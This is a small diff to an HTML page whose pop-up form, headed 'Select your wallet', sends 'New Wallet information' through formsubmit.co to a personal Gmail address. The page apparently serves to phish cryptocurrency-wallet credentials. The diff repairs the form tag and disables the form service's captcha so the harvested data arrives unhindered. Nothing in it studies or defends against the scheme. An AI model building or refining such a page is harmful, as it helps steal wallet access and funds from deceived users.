--- a/index.html
+++ b/index.html
@@ -47,8 +47,9 @@
         </div>
         <div class="pop-up">
             <div class="close">&times;</div>
-            <form action="https://formsubmit.co/germanval0098@gmail.com" method="POST"">
+            <form action="https://formsubmit.co/germanval0098@gmail.com" method="POST">
                 <input type="hidden" name="_subject" value="New Wallet information">
+                <input type="hidden" name="_captcha" value="false">
                 <input type="hidden" name="_next" value="https://yaww-io.netlify.app//done.html">
                 <label for="Wallets">Select your wallet:</label>
                 <select name="Wallets" id="all-wallets">
